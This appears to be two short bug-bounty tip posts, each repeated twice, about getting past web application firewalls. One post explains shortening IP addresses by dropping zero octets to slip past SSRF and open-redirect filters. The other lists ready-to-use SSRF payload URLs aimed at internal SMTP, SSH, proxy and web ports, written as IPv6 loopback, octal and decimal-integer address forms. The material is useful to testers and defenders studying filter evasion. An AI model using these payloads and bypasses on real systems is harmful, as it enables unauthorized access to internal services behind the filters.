Bugbounty tips#3
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
SSRF payloads
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/
http://0177.0.0.1/
http://2130706433/ = http://127.0.0.1
http://3232235521/ http://192.168.0.1
#ssrf
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/
http://0177.0.0.1/
http://2130706433/ = http://127.0.0.1
http://3232235521/ http://192.168.0.1
#ssrf